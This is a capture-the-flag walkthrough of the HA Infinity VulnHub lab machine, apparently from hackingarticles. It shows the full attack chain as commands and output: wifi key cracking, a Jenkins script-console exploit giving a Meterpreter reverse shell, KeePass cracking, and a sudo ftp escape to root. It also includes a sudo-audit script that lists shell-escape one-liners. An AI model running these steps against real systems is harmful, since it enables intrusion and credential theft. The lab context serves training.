HA INFINITY (VULNHUB)

LINK: https://drive.google.com/file/d/1kLXbHgdx92YRJLdRnf_EVZWEulA0MYYo/view

root@kali:~/Downloads# nmap -A 192.168.222.145
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 16:04 GMT
Nmap scan report for 192.168.222.145
Host is up (0.00021s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
| 256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
|_ 256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=ignite/organizationName=MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}/stateOrProvinceName=UP/countryName=IN
| Not valid before: 2019-09-15T17:18:57
|_Not valid after: 2020-09-14T17:18:57
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 00:0C:29:2F:41:F7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.21 ms 192.168.222.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.07 seconds

now on browser

http://192.168.222.145/

Port 80 serves the "HA:Infinity Stones" landing page. Port 8080 is more interesting: Jetty 9.4.z-SNAPSHOT with a robots.txt that disallows "/" is what Jenkins ships with, and the root redirects to a Jenkins login page:

http://192.168.222.145:8080/login?from=%2F

We have no credentials for it yet, so we enumerate the web root on port 80 first.

now on terminal

root@kali:~/Downloads# dirb http://192.168.222.145

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct 21 16:07:14 2019
URL_BASE: http://192.168.222.145/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.222.145/ ----
==> DIRECTORY: http://192.168.222.145/images/
==> DIRECTORY: http://192.168.222.145/img/
+ http://192.168.222.145/index.html (CODE:200|SIZE:3261)
+ http://192.168.222.145/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.222.145/wifi/

---- Entering directory: http://192.168.222.145/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.222.145/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.222.145/wifi/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Oct 21 16:07:17 2019
DOWNLOADED: 4612 - FOUND: 2

now on browser

http://192.168.222.145/img/

Directory listing is enabled on /images/, /img/ and /wifi/. The /img/ listing contains a single file, space.jpg:

http://192.168.222.145/img/space.jpg

We download it and inspect its metadata, because JPEG comment and EXIF fields are a common hiding place for a flag.

now on terminal

root@kali:~/Downloads# exiftool space.jpg
ExifTool Version Number : 11.70
File Name : space.jpg
Directory : .
File Size : 17 kB
File Modification Date/Time : 2019:10:21 16:08:50+00:00
File Access Date/Time : 2019:10:21 16:08:50+00:00
File Inode Change Date/Time : 2019:10:21 16:08:50+00:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : SPACESTONE:{74E57403424607145B9B77809DEB49D0}
Image Width : 768
Image Height : 432
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 768×432
Megapixels : 0.332

now try to access

https://192.168.222.145/

The HTTPS site itself only returns 400 Bad Request, but its certificate carries the next flag. In the browser's certificate viewer (Firefox: padlock -> Connection secure -> More information -> View Certificate) the Organization field of the subject reads MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}, the same value nmap's ssl-cert script printed as organizationName above.

Next, the listable /wifi/ directory, which holds two files, pwd.txt and reality.cap:

https://192.168.222.145/wifi/

root@kali:~/Downloads# wget http://192.168.222.145/wifi/pwd.txt
--2019-10-21 16:19:37-- http://192.168.222.145/wifi/pwd.txt
Connecting to 192.168.222.145:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 254 [text/plain]
Saving to: 'pwd.txt'

pwd.txt 100%[===================================================================>] 254 --.-KB/s in 0s

2019-10-21 16:19:37 (49.8 MB/s) - 'pwd.txt' saved [254/254]

root@kali:~/Downloads# cat pwd.txt
Your Password is thanos daughter name “gam” (note it’s all lower case) plus the following
I enforced new password requirement on you … 12 characters

One uppercase charracter
Two Numbers
Two Lowercase
The Year of first avengers came out in threatre

root@kali:~/Downloads# crunch 12 12 -t gam,%%@@2012 -o dict.txt
Crunch will now generate the following amount of data: 22848800 bytes
21 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1757600

crunch: 100% completed generating output
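The crunch pattern above encodes the pwd.txt policy as one fixed layout: "gam", one uppercase letter (","), two digits ("%%"), two lowercase letters ("@@") and "2012". As an added example (not part of the original walkthrough), the following Python reproduces what that pattern enumerates, so the line and byte counts crunch reported can be checked, and also sizes the keyspace the policy really allows: the hint fixes how many characters of each class appear but not their order, so the single pattern covers only one of the possible arrangements. The placeholder meanings are crunch's; the reading of the policy is the walkthrough's.

```python
"""Size and sanity-check the crunch keyspace derived from pwd.txt.

Added example, not part of the original walkthrough. It emulates the three
crunch -t placeholders used on this page (',' = uppercase, '%' = digit,
'@' = lowercase; literal characters pass through). crunch's '^' symbol
class is omitted because its default symbol set is not shown here.
"""
import itertools
import string
from math import prod
from typing import Iterator

PLACEHOLDERS = {
    ",": string.ascii_uppercase,
    "%": string.digits,
    "@": string.ascii_lowercase,
}

PATTERN = "gam,%%@@2012"        # the pattern the walkthrough fed to crunch
RECOVERED_KEY = "gamA00fe2012"  # the key aircrack-ng later recovered


def keyspace_size(pattern: str) -> int:
    """Number of candidates crunch emits for a -t pattern."""
    return prod(len(PLACEHOLDERS[c]) if c in PLACEHOLDERS else 1 for c in pattern)


def output_bytes(pattern: str) -> int:
    """Size of the resulting wordlist: every candidate plus a newline."""
    return keyspace_size(pattern) * (len(pattern) + 1)


def candidates(pattern: str) -> Iterator[str]:
    """Yield the wordlist in crunch order (rightmost placeholder varies fastest)."""
    slots = [PLACEHOLDERS.get(c, c) for c in pattern]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def in_keyspace(pattern: str, word: str) -> bool:
    """Would crunch's list for this pattern contain `word`?"""
    return len(word) == len(pattern) and all(
        ch in PLACEHOLDERS.get(p, p) for p, ch in zip(pattern, word)
    )


def meets_policy(word: str) -> bool:
    """pwd.txt as read here: 12 chars, 'gam' prefix, '2012' suffix, and in
    between exactly one uppercase letter, two digits and two lowercase
    letters, in any order."""
    middle = word[3:-4]
    return (
        len(word) == 12
        and word.startswith("gam")
        and word.endswith("2012")
        and sum(c.isupper() for c in middle) == 1
        and sum(c.isdigit() for c in middle) == 2
        and sum(c.islower() for c in middle) == 2
    )


def policy_keyspace_size() -> int:
    """The policy fixes how many characters of each class appear, not their
    order. Each distinct arrangement of ',%%@@' is a separate crunch pattern,
    so the full policy-compliant space is that many times the single pattern."""
    orderings = {"".join(p) for p in itertools.permutations(",%%@@")}
    return sum(keyspace_size("gam" + o + "2012") for o in orderings)


if __name__ == "__main__":
    print(f"crunch -t {PATTERN}: {keyspace_size(PATTERN):,} lines, "
          f"{output_bytes(PATTERN):,} bytes")
    print(f"first candidate: {next(candidates(PATTERN))}")
    print(f"{RECOVERED_KEY} in pattern keyspace: {in_keyspace(PATTERN, RECOVERED_KEY)}")
    print(f"{RECOVERED_KEY} meets policy: {meets_policy(RECOVERED_KEY)}")
    print(f"all orderings the policy allows: {policy_keyspace_size():,} candidates")
```

The single pattern gives 1,757,600 candidates in a 22,848,800-byte file, matching crunch's own summary; the 30 possible orderings of the one uppercase, two digits and two lowercase characters would give 52,728,000. The walkthrough's guess at the order happened to be right; had the key been gam00Afe2012, the same dictionary would have missed it.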

The other file in /wifi/ is reality.cap. Opening it shows captured wifi traffic, so we ran aircrack-ng against the capture with the crunch wordlist (dict.txt) as the dictionary, and it recovered the wifi key:

key found : gamA00fe2012

The key doubles as the name of a hidden directory on the HTTPS site:

https://192.168.222.145/gamA00fe2012/realitystone.txt

output : REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

now try to access :

https://192.168.222.145/aether.php

This page is a true/false quiz about the films. Each answer maps to one bit (False = 0, True = 1):

No.  Question                                                        Answer  Bit
1.   In the beginning, there are 3 infinity stones on earth.         False   0
2.   At the end, there are two survivors on Titan.                   True    1
3.   Thanos already had the power stone when he first appeared.      True    1
4.   Tesseract contains the reality stone.                           False   0
5.   The dwarf on Ndavellir is played by Peter Dinklage              True    1
6.   Red skull is the guardian of space stone.                       False   0
7.   Thor's new hammer is called stormbuster.                        False   0
8.   Rocket is the only Guardian of the Galaxy to survive the snap.  True    1

Read top to bottom, the bits form the string 01101001. That string is the name of another hidden directory, which holds a hints.txt. Its content is not ciphertext but a program in Brainfuck, an esoteric language with only eight instructions (+ - < > . , [ ]); running the program prints the hidden text.
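Rather than depending on a web tool, the program can be run locally. The interpreter below is an added example, not part of the original walkthrough; HINTS_BF is the program served from /01101001/hints.txt, copied verbatim with plain ASCII hyphens. It bounds the step count so an untrusted program cannot hang the decoder, checks bracket balance up front, and splits the output into the user:password pair the rest of the walkthrough uses.

```python
"""Decode hints.txt offline with a small Brainfuck interpreter.

Added example, not part of the original walkthrough. HINTS_BF is the
program served from /01101001/hints.txt on the box. Cells are unsigned
bytes that wrap, the behaviour most interpreters (including the online
tool the walkthrough used) assume.
"""
from typing import Tuple

HINTS_BF = """
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
+++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
+++<] >++++ .+.<
"""

INSTRUCTIONS = set("<>+-.,[]")


def match_brackets(code: str) -> dict:
    """Map every '[' to its ']' and back; reject unbalanced programs."""
    jumps, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at instruction {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at instruction {stack[-1]}")
    return jumps


def run_brainfuck(src: str, stdin: bytes = b"", tape_len: int = 30000,
                  max_steps: int = 1_000_000) -> str:
    """Execute `src` and return everything it printed as latin-1 text.
    Characters outside the eight instructions are comments. max_steps caps
    runtime so a looping or malicious program cannot hang the caller."""
    code = "".join(c for c in src if c in INSTRUCTIONS)
    jumps = match_brackets(code)
    tape = bytearray(tape_len)
    out = bytearray()
    inp = iter(stdin)
    ptr = pc = steps = 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == ">":
            ptr += 1
            if ptr >= tape_len:
                raise IndexError("pointer ran off the right end of the tape")
        elif c == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("pointer ran off the left end of the tape")
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = next(inp, 0)  # EOF reads as 0
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]            # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]            # back to the matching '['
        pc += 1
    return out.decode("latin-1")


def split_credentials(text: str) -> Tuple[str, str]:
    """Interpret decoded output of the form user:password."""
    user, sep, password = text.strip().partition(":")
    if not sep:
        raise ValueError("decoded text is not in user:password form")
    return user, password


if __name__ == "__main__":
    decoded = run_brainfuck(HINTS_BF)
    print("decoded:", decoded)
    print("credentials:", split_credentials(decoded))
```

Running it prints admin:avengers, the same result the online tool gives below.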

now

https://192.168.222.145/01101001/hints.txt

we get

+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
+++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
+++<] >++++ .+.<

Pasting this into the "Brainfuck to text" box at https://www.splitbrain.org/_static/ook/ and running it prints:

admin:avengers

That is almost certainly a username:password pair, and the obvious place to try it is the Jenkins login we found on port 8080.

now on browser

http://192.168.222.145:8080/login?from=%2F
username : admin
password : avengers

We are in. A Jenkins account that can reach the script console can run arbitrary Groovy on the server, and the Metasploit module exploit/multi/http/jenkins_script_console automates that into a reverse shell.

now on terminal

msf5 > use exploit/multi/http/jenkins_script_console

msf5 exploit(multi/http/jenkins_script_console) > set target 1
target => 1

msf5 exploit(multi/http/jenkins_script_console) > set RHOSTS 192.168.222.145
RHOSTS => 192.168.222.145

msf5 exploit(multi/http/jenkins_script_console) > set username admin
username => admin

msf5 exploit(multi/http/jenkins_script_console) > set password avengers
password => avengers

msf5 exploit(multi/http/jenkins_script_console) > set targeturi /
targeturi => /

msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8080
RPORT => 8080
msf5 exploit(multi/http/jenkins_script_console) > exploit

[*] Started reverse TCP handler on 192.168.222.132:4444
[*] Checking access to the script console
[*] Logging in…
[*] Using CSRF token: '2a236090355ef1c3c2127416c9f3bd85' (Jenkins-Crumb style)
[*] 192.168.222.145:8080 – Sending Linux stager…
[*] Sending stage (985320 bytes) to 192.168.222.145
[*] Meterpreter session 1 opened (192.168.222.132:4444 -> 192.168.222.145:51132) at 2019-10-21 16:41:20 +0000

meterpreter >
[!] Deleting /tmp/EBLKO payload file

Drop to a system shell, upgrade it to a proper tty with Python, and list SUID binaries. Everything in the list is stock Ubuntu or snap except /opt/script, which is worth a closer look:

meterpreter > shell
Process 1379 created.
Channel 1 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
jenkins@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
/opt/script
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/arping
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/snap/core18/1144/bin/mount
/snap/core18/1144/bin/ping
/snap/core18/1144/bin/su
/snap/core18/1144/bin/umount
/snap/core18/1144/usr/bin/chfn
/snap/core18/1144/usr/bin/chsh
/snap/core18/1144/usr/bin/gpasswd
/snap/core18/1144/usr/bin/newgrp
/snap/core18/1144/usr/bin/passwd
/snap/core18/1144/usr/bin/sudo
/snap/core18/1144/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1144/usr/lib/openssh/ssh-keysign
/snap/core18/1223/bin/mount
/snap/core18/1223/bin/ping
/snap/core18/1223/bin/su
/snap/core18/1223/bin/umount
/snap/core18/1223/usr/bin/chfn
/snap/core18/1223/usr/bin/chsh
/snap/core18/1223/usr/bin/gpasswd
/snap/core18/1223/usr/bin/newgrp
/snap/core18/1223/usr/bin/passwd
/snap/core18/1223/usr/bin/sudo
/snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1223/usr/lib/openssh/ssh-keysign
/snap/core/7917/bin/mount
/snap/core/7917/bin/ping
/snap/core/7917/bin/ping6
/snap/core/7917/bin/su
/snap/core/7917/bin/umount
/snap/core/7917/usr/bin/chfn
/snap/core/7917/usr/bin/chsh
/snap/core/7917/usr/bin/gpasswd
/snap/core/7917/usr/bin/newgrp
/snap/core/7917/usr/bin/passwd
/snap/core/7917/usr/bin/sudo
/snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7917/usr/lib/openssh/ssh-keysign
/snap/core/7917/usr/lib/snapd/snap-confine
/snap/core/7917/usr/sbin/pppd
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd

Post Enumeration :

The custom SUID binary prints the next flag (with no trailing newline, so the prompt runs on):

jenkins@ubuntu:/$ /opt/script
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/$ cd /opt
jenkins@ubuntu:/opt$ ls
morag.kdbx script
jenkins@ubuntu:/opt$ exit

morag.kdbx is a KeePass 2 database. We pull it back to Kali with meterpreter:
meterpreter > cd /opt
meterpreter > ls
Listing: /opt
=============

Mode Size Type Last modified Name
—- —- —- ————- —-
100644/rw-r–r– 2558 fil 2019-09-16 04:35:52 +0000 morag.kdbx
104755/rwxr-xr-x 8304 fil 2019-09-15 17:48:53 +0000 script

meterpreter > download morag.kdbx .
[*] Downloading: morag.kdbx -> ./morag.kdbx
[*] Downloaded 2.50 KiB of 2.50 KiB (100.0%): morag.kdbx -> ./morag.kdbx
[*] download : morag.kdbx -> ./morag.kdbx

root@kali:~/Downloads# python keepass.py morag.kdbx > hash

(The script converts the .kdbx header into a hash John can attack; John the Ripper jumbo ships this converter as keepass2john.)

root@kali:~/Downloads# john hash

john cracks the master password:

Password : princesa

Now open the database with it:

root@kali:~/Downloads# keepass2 morag.kdbx

master password : princesa

The database holds an entry named creds for the user morag. Double-clicking it, the Notes field contains:

bW9yYWc6eW9uZHU=

now on another terminal

root@kali:~/Downloads# echo "bW9yYWc6eW9uZHU=" | base64 -d
morag:yondu

root@kali:~/Downloads# ssh morag@192.168.222.145
The authenticity of host '192.168.222.145 (192.168.222.145)' can't be established.
ECDSA key fingerprint is SHA256:Ue2PMJVZR7FXTGM2l6vKFTogkhrz5kPZovzO2vptgAU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.222.145' (ECDSA) to the list of known hosts.
morag@192.168.222.145's password: yondu
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

* Canonical Livepatch is available for installation.
– Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

471 packages can be updated.
242 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.

▄████████ ███ ▄██████▄ ███▄▄▄▄ ▄████████ ▄████████
███ ███ ▀█████████▄ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███
███ █▀ ▀███▀▀██ ███ ███ ███ ███ ███ █▀ ███ █▀
███ ███ ▀ ███ ███ ███ ███ ▄███▄▄▄ ███
▀███████████ ███ ███ ███ ███ ███ ▀▀███▀▀▀ ▀███████████
███ ███ ███ ███ ███ ███ ███ █▄ ███
▄█ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
▄████████▀ ▄████▀ ▀██████▀ ▀█ █▀ ██████████ ▄████████▀

www.hackingarticles.in

Last login: Sun Sep 15 23:13:55 2019 from 192.168.0.6

morag@ubuntu:~$

morag@ubuntu:~$ sudo -l
Matching Defaults entries for morag on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User morag may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/ftp
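A rule like this is easy to miss in a long sudoers file, so it pays to check mechanically. As an added example (not part of the original walkthrough), the following Python parses `sudo -l` output like the one above and flags commands that can break out to a shell. The sample text embeds the box's real ftp rule plus two constructed rules for contrast: a NOEXEC-tagged less, where sudo's noexec blocks the exec() a shell escape needs, and a harmless id. The escape table is illustrative and deliberately short.

```python
"""Flag sudo rules whose permitted command can escape to a shell.

Added example, not part of the original walkthrough. Parses the text
`sudo -l` prints and matches each permitted command against a small,
illustrative table of programs that can spawn a shell from inside
themselves (ftp's '!' is the one this box uses; the rest are well-known
GTFOBins-style escapes). The table is not exhaustive. SAMPLE_SUDO_L is
the box's real rule plus two constructed rules added for contrast.
"""
import re
from typing import Dict, List, Set, Tuple

# program basename -> how it yields a shell (illustrative, not exhaustive)
SHELL_ESCAPES: Dict[str, str] = {
    "ftp": "'!/bin/bash' at the ftp> prompt runs a shell",
    "less": "'!' at the pager prompt runs a shell command",
    "more": "'!' at the pager prompt runs a shell command",
    "man": "'!' in the pager it spawns runs a shell command",
    "vi": "':!/bin/bash' or ':shell'",
    "vim": "':!/bin/bash' or ':shell'",
    "awk": "BEGIN { system(\"/bin/bash\") }",
    "find": "-exec /bin/bash \\;",
    "python": "-c 'import os; os.system(\"/bin/bash\")'",
    "python3": "-c 'import os; os.system(\"/bin/bash\")'",
    "perl": "-e 'exec \"/bin/bash\"'",
    "env": "env /bin/bash",
}

# Constructed sample: the real rule from this box plus two rules for contrast.
SAMPLE_SUDO_L = r"""Matching Defaults entries for morag on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User morag may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOEXEC: /usr/bin/less
    (root) /usr/bin/id
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<body>\S.*)$")
TAG_RE = re.compile(r"^(?P<tag>[A-Z_]+):\s*")
HEADER_RE = re.compile(r"^User \S+ may run the following commands")

Rule = Tuple[str, Set[str], List[str]]  # (runas, tags, commands)


def parse_sudo_l(text: str) -> List[Rule]:
    """Return (runas, tags, commands) for each rule under the 'User ... may run' header."""
    rules: List[Rule] = []
    in_rules = False
    for line in text.splitlines():
        if HEADER_RE.match(line):
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").strip()
        body = m.group("body")
        tags: Set[str] = set()
        while (t := TAG_RE.match(body)):  # NOPASSWD:, NOEXEC:, SETENV:, ...
            tags.add(t.group("tag"))
            body = body[t.end():]
        commands = [c.strip() for c in body.split(",") if c.strip()]
        rules.append((runas, tags, commands))
    return rules


def audit(text: str) -> List[dict]:
    """One finding per permitted command that yields a shell. NOEXEC is
    recorded because sudo's noexec blocks the exec() such escapes rely on."""
    findings = []
    for runas, tags, commands in parse_sudo_l(text):
        target_user = runas.split(":")[0].strip()
        as_root = target_user in ("root", "ALL")
        for cmd in commands:
            program = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "ALL permits any command, including a shell"
            elif program in SHELL_ESCAPES:
                reason = SHELL_ESCAPES[program]
            else:
                continue
            findings.append({
                "command": cmd,
                "as_root": as_root,
                "nopasswd": "NOPASSWD" in tags,
                "blocked_by_noexec": "NOEXEC" in tags,
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        flag = "BLOCKED(NOEXEC)" if f["blocked_by_noexec"] else "ESCAPE"
        print(f"{flag:16} root={f['as_root']} nopasswd={f['nopasswd']} "
              f"{f['command']}: {f['reason']}")
```

On the sample it reports /usr/bin/ftp as a passwordless root shell escape, marks /usr/bin/less as blocked by NOEXEC, and stays silent on /usr/bin/id. The same logic applied to the real rule above is what the privilege escalation that follows exploits by hand.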

Privilege Escalation :

ftp runs a shell command when the line starts with "!", and because sudo launches ftp as root without a password, the shell it spawns is root too:

morag@ubuntu:~$ sudo ftp
ftp> !/bin/bash
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
final.txt
root@ubuntu:/root# cat final.txt
┬┬╔═╗┌─┐┌┐┌┌─┐┬─┐┌─┐┌┬┐┬ ┬┬ ┌─┐┌┬┐┬┌─┐┌┐┌┌─┐ ┬ ┬┌─┐┬ ┬ ┌─┐┌─┐┬ ┬┌┐┌┌┬┐ ┌┬┐┬ ┬┌─┐ ┌─┐┬┌┐┌┌─┐┬ ┌─┐┬ ┌─┐┌─┐ ┬┬
││║ │ │││││ ┬├┬┘├─┤ │ │ ││ ├─┤ │ ││ ││││└─┐ └┬┘│ ││ │ ├┤ │ ││ ││││ ││ │ ├─┤├┤ ├┤ ││││├─┤│ ├┤ │ ├─┤│ ┬ ││
oo╚═╝└─┘┘└┘└─┘┴└─┴ ┴ ┴ └─┘┴─┘┴ ┴ ┴ ┴└─┘┘└┘└─┘ ┴ └─┘└─┘ └ └─┘└─┘┘└┘─┴┘ ┴ ┴ ┴└─┘ └ ┴┘└┘┴ ┴┴─┘ └ ┴─┘┴ ┴└─┘ oo

,g@@@@@@g,
@@@@NMMN@@@g,gggpg,
]@@@` “@@@@@@@@@@@@ ,,,,
]@@@ $@@@” “%@@@@@@@@@@g
]@@@ $@@@ ]@@@@M*”*%@@@g@@@@@@g
]@@@ $@@@ ]@@@L ]@@@@@NN@@@@g
]@@@ $@@@ ]@@@` ]@@@’ ]@@@L
]@@@ggg $@@@ ]@@@` ]@@@ $@@P
]@@@@@@L $@@@@@@ ]@@@L ]@@@ $@@P
]@@@@@ 1 “%@@@@F ‘%@@@@@W $@@@,,, $@@P
]@@@@@, $@@@L 2 ]@@@M ‘%@@@@@ ]@@@@,
,,,,]@@@@@@@g@@@@@@@, ,@@@@ 3 $@@@’ ‘%@@@
,g@@@@@@@@@@”%%N@@NM*%@@@@@@@@@@@@,,,,@@@@L 4 ]@@@F
g@@@M*”””%@@@ ‘”MMMMM'”%@@@@@@@@@@@@g,,g@@@M
j@@@F ]@@@ “****’ “%@@@@@@@@P
]@@@L ]@@@ ,ggggg, ””}$@@P
]@@@L g@@@@@@ g@@@@@@@@@g j@@@ $@@P
]@@@L %NN@@@@ $@@@C ]@@@@ ]@@@L $@@P
]@@@L ‘%M” j@@@F 6 ]@@@ ]@@@L $@@P
]@@@L ‘@@@@ $@@@ ]@@@L $@@P
]@@@gg@@@@w ]@@@@ggg@@@@L ]@@@L]@@@L
%@@@@@@NM” ‘%@@@@@@@M` ;@@@M j@@@L
]@@@@ ,@@g ”` #@@@M )@@@M
]@@@L 5 $@@@ `**`,@@@@F
]@@@Wggg@@@@F ,g@@@@@`
“%@@@@@@@@@@@@@@@g ,@@@@@@@@@
‘””*%N@@@@@@@M *MF” ‘$@@@
@@@@ gg, j@@@,
$@@@` j@@@L %@@@
.@@@@ %@@@ ]@@@

SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}

@SAKSHAM DIIXT